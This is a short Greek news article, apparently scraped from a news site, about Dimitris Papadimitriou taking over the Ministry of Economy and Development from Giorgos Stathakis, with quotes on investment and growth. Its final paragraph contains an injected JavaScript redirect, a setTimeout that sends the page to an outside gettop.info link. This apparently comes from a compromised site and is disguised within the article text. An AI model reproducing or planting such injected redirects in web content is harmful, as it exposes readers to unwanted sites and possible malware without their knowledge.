Παπαδημητρίου: Κοινός σκοπός η δίκαιη ανάπυξη της χώρας (ΒΙΝΤΕΟ)

0
14

 

Ο Γιώργος Σταθάκης παρέδωσε χαρτοφυλάκιο στον Δημήτρη Παπαδημητρίου, στο υπουργείο Οικονομίας και Ανάπτυξης. Κατά την τελετή παράδοσης παραλαβής ο κ. Σταθάκης ανέφερε πως «Υπάρχουν ακόμα ορισμένα προβλήματα στη Διοικητική μεταρρύθμιση» ενώ ο κ Παπαδημητρίου σχολίασε ότι «οι επενδύσεις είναι η ατμομηχανή της οικονομίας». Επιπλέον ανέφερε πως «Θα προσπαθήσουμε να περιορίσουμε τις παθογένειες» καθώς και ότι ο κ. Σταθάκης και οι συνεργάτες του έχουν βάλει τα στέρεα θεμέλια.

«Σηκώνουμε τα μανίκια από σήμερα και αρχίζουμε σκληρή δουλειά. Η δίκαιη ανάπτυξη της χώρας δεν μπορεί παρά να αποτελέσει έναν κοινό σκοπό. Φιλοδοξώ να υπηρετήσω την πατρίδα και την κυβέρνηση και με τη συμπαράταση σας θα αντιμετωπσίουμε με επιτυχία τις μεγάλες προκλήσεις που βρίσκονται μπροστά μας» επεσήμανε ο κ. Παπαδημητρίου.


 

Ο κ. Χαρίτσης επεσήμανε ότι «Με την ολοκλήρωση και της δεύτερης αξιολόγησης να μπορέσουμε να μιλάμε για επιστροφή της ελληνικής οικονομίας σε ρυθμούς ανάπτυξης». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here